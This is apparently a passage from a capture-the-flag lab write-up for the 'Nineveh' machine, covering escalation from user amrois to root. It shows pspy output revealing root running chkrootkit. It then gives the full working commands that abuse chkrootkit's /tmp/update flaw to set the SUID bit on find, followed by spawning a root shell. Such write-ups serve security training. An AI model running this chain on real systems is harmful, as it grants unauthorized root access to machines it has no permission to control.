5 privesc amrois > root

# pspy
every minute lots of activity, this is run many times
2021/09/29 19:44:04 CMD: UID=0    PID=2251   | /bin/sh /usr/bin/chkrootkit

Using https://www.exploit-db.com/exploits/33899
| Result: The file /tmp/update will be executed as root, thus effectively rooting your box, if malicious content is placed inside the file.

amrois@nineveh:~$ ls -la /usr/bin/find
-rwxr-xr-x 1 root root 221768 Feb  7  2016 /usr/bin/find

amrois@nineveh:~$ cat << EOF > /tmp/update
> #!/bin/bash
>
> chmod +s /usr/bin/find;
> EOF
amrois@nineveh:~$ chmod +x /tmp/update

amrois@nineveh:~$ ls -la /usr/bin/find
-rwsr-sr-x 1 root root 221768 Feb  7  2016 /usr/bin/find

amrois@nineveh:~$ find . -exec /bin/bash -p \; -quit
bash-4.3# whoami;id
root
uid=1000(amrois) gid=1000(amrois) euid=0(root) egid=0(root) groups=0(root),1000(amrois)

Last updated